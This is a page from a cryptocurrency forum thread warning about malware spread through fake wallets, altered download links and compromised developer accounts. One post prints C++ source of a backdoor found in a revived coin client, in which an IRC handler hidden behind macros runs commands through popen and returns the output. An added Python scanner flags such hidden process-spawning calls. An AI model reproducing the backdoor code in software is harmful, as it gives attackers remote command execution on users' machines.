Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 5. (Read 843901 times)

newbie
Activity: 42
Merit: 0
The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that, I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one whose Dropbox is encrypted by cryptoware, Dropbox can put back a backup for up to 30 days, I believe. Don't wait too long to contact them.
newbie
Activity: 28
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
    // Handler in the IRC bootstrap code: reacts to a PRIVMSG whose fourth word is ":!"
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // CRead is a macro alias: the rest of the line after ":!" is handed to a process-spawning call
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            // Collect everything the spawned process prints
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            // Recover the sender's nick (text after ':' up to '!') and send the output back to them
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }
Here is the source code with macros resolved:
Code:
    // Same handler with CBuff, CRead and CFree expanded: it is a popen()-based remote shell
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // The text after ":!" in the incoming IRC message is executed via popen()
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            // Read the command's output
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            // Reply to the sender's nick with the output
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
OMG thank you for warning this kind of "hacking"
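A reviewer-side check for the macro-hidden process spawn described in the quoted post, added here as an example (not the forum's, the coin's or the original author's code): it follows simple object-like #define aliases such as CRead for popen and reports every call site that ends up spawning a process, so a clone's source can be audited for this trick without trusting virus scans. The sample source, macro names and file layout below are constructed to mirror the quoted snippet.

```python
import re

# Process-spawning primitives that have no business in a coin's IRC/bootstrap code.
DANGEROUS = {"popen", "system", "execl", "execlp", "execv", "execvp", "execve"}

# Object-like macros of the form "#define NAME TARGET" (no arguments, no quotes).
DEFINE_RE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(\w+)\s*$", re.M)
CALL_RE = re.compile(r"\b(\w+)\s*\(")


def resolve_aliases(src):
    """Map macro names to the dangerous function they ultimately expand to."""
    defs = dict(DEFINE_RE.findall(src))
    aliases = {}
    for name in defs:
        target, seen = name, set()
        while target in defs and target not in seen:  # follow chains like B -> A -> popen
            seen.add(target)
            target = defs[target]
        if target in DANGEROUS:
            aliases[name] = target
    return aliases


def find_spawns(src):
    """Return (line, callee, resolved_function) for every process-spawning call site."""
    aliases = resolve_aliases(src)
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if line.lstrip().startswith("#"):  # skip the #define lines themselves
            continue
        for m in CALL_RE.finditer(line):
            callee = m.group(1)
            if callee in DANGEROUS:
                hits.append((lineno, callee, callee))
            elif callee in aliases:
                hits.append((lineno, callee, aliases[callee]))
    return hits


# Constructed sample mirroring the quoted snippet: the macros hide popen/pclose.
SAMPLE = """\
#define CBuff "PRIVMSG"
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) { CFree(buf); }
}
"""

if __name__ == "__main__":
    for lineno, callee, real in find_spawns(SAMPLE):
        print(f"line {lineno}: {callee}() expands to {real}()")
```

Running it on a real tree means feeding each source file to find_spawns and reviewing every hit by hand; the check is deliberately simple and will not see function-like macros or aliases spread across files.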
full member
Activity: 504
Merit: 107
Thank you very much for the information! I didn't even know about such an infection... I always try to sidestep various unfamiliar programs... But, for example, more and more conditions are encountered in bounty campaigns - download the wallet... This is often alarming. Especially if the project does not inspire confidence, even after reading the white paper. Recently I found out that telegrams actively distribute links in chat rooms on behalf of well-known projects whose files contain a virus... When you open a file, it loads; it is not just viewed in the chat.
newbie
Activity: 3
Merit: 0
Yes, attacks are getting more sophisticated.
There are also .SCR "screenshot" downloads being circulated in Telegram groups.
These are actually malware screensaver EXEs which are able to scrape private keys.

Take care out there.

intsol
full member
Activity: 420
Merit: 111
Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to be attacked by bitcoin mining viruses. For 3 days I was attacked by them.
newbie
Activity: 33
Merit: 0
Any actions have to be entranced which are of great sufficiency to keep safe your organizations from being hacked, such as not to apply unnamed exe, and apply of unix which looks as if to be less vulnerable to viruses.
newbie
Activity: 22
Merit: 0
Basic, thanks representing your distribution. This data is extremely significant representing each fellow of this assembly. That's an extremely devil-may-care conflict, reason should anyone achieve that. We have to be deliberate of malware assails and have to study many almost how to keep off them.
full member
Activity: 854
Merit: 100
I was one of the victims of this malware 'scams' who took all my Minexcoin. My anti-virus didn't alert me of any suspicious activity on my PC until I opened my wallet with a zero balance. I just wish I did stake my MNX on the Minex bank.
newbie
Activity: 4
Merit: 0
I have experienced such an issue before. I have since quit utilizing bitcoin center as a wallet and have not had a wallet that you have to download to your PC to utilize it, since I think it's irritating to need to download the blockchain each time you sign into the program. Also it eats up a lot of my data transmission that I am by all accounts coming up short on when the month's end approaches.
newbie
Activity: 15
Merit: 0
I base extremely worthy data hither representing myself. Instantly I recognise how to keep safe myself from afflicted-wishers. I thank the initiator of this theme and each of those who join in the talk and plam worthy data.
full member
Activity: 560
Merit: 113
What I encountered (currently missing from the first post) is a copy of the ANN, but with a "team donation address" added at the bottom.
full member
Activity: 376
Merit: 103
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.

How can this be possible, also how did you know it was mining?
If you see unusual usage of your GPU/video card/HDD it means that something is running that you never noticed.

And it's possible that it's mining through any of those, and the cause of it is that you probably clicked and downloaded malware that contains mining software.
It is not necessary to download a phishing malware to give permission to your device to mine for hackers. Some of the new methods are accessing your cpu/gpu only with your navigator, so it just needs you to make a click on a wrong link you received via email or visit a website where you are asked to accept installing cookies into your browser. I don't really know how to identify them, but it is just recommended to not use any suspicious link and to frequently verify your cpu/gpu work.
full member
Activity: 854
Merit: 102
Now this topic is relevant. The progress and development of cryptocurrency does not stand still, and scammers are also inventing new ways of hacking. Therefore, you need to be careful and monitor security.
legendary
Activity: 2100
Merit: 1340
More and more new harmful programs appear every day, so it was always that someone wants to steal someone else's money; it's because hackers cannot catch the police.
newbie
Activity: 6
Merit: 0
I have likewise seen this: I was not able to download one of the digital currency centers as it was hailed up as being hurtful by Norton web security! This is very likely with the majority of the cryptographic money centers, as they are open source, which amounts to nothing shielding them from being hacked and set onto the digital currency's site, keeping in mind the end goal to assault the PCs of numerous clients!
sr. member
Activity: 376
Merit: 251
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.

How can this be possible, also how did you know it was mining?
If you see unusual usage of your GPU/video card/HDD it means that something is running that you never noticed.

And it's possible that it's mining through any of those, and the cause of it is that you probably clicked and downloaded malware that contains mining software.
newbie
Activity: 56
Merit: 0
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.

How can this be possible, also how did you know it was mining?
member
Activity: 336
Merit: 13
What a shite. When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice.
legendary
Activity: 2100
Merit: 1340
Every day more and more new virus programs emerge that our electronic wallets are working programs and so on, otherwise the antiviruses would react as quickly and those harmful programs would appear.
newbie
Activity: 14
Merit: 0
Thanks representing this, it's a large support. I get an associate got hacked and he doesn't recognise how he's been taxicab, so aloof want recognise is thither whatever opportunity to avoid this similar opposed virus. What desire you recommended antivirus to avoid this form of malware? Thanks, it's a large support.